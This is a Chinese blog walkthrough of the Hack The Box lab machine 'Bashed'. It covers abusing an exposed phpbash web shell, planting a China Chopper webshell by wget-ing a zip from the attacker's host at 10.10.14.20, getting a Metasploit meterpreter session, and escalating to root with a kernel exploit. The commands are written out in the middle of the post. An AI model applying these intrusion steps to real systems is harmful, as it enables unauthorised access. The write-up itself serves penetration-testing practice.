中间件漏洞收集

【HTB】Bashed(可执行命令漏洞,内核提权)

2021-04-07  本文已影响0人  天线锅仔

信息收集

image.png

开了80端口,浏览器打开看看


image.png

一个叫phpbash的软件,网站找了一圈好像没有啥可以利用的东西。
目录爆破看看:


image.png
打开dev目录,发现两个文件
image.png
打开phpbash.php,发现是一个shell image.png

攻击

因为可以执行任意shell,那就可以上传任意文件通过msf拿到meterpreter,生成一个木马,在本地开一个http服务,通过wget的方式从目标机器拉取本地的后门文件。
需要注意的是,不能直接拉取本地的php文件,必须在本地打包以后再拉取,我在这里就傻了,搞了半天。。。
另外,dev目录是没有写权限的,需要在uploads文件夹操作
最近知道msf里有一个中国菜刀的模块,于是决定用一下。
写一句话木马:


image.png

执行打包:

zip caidao.zip caidao.php

本地开启apache:

service apache2 start

在网页shell拉取

wget -P /var/www/html/uploads  http://10.10.14.20/caidao.zip

解压:

unzip /var/www/html/uploads/caidao.zip -d /var/www/html/uploads/caidao
image.png

拿到meterpreter:


image.png

提权

查看系统版本

image.png
根据内核版本找了一圈,最后在这篇文章提到的方法里找到了一个提权脚本。
编译,上传,执行
image.png
拿到root权限和flag
上一篇 下一篇

猜你喜欢

热点阅读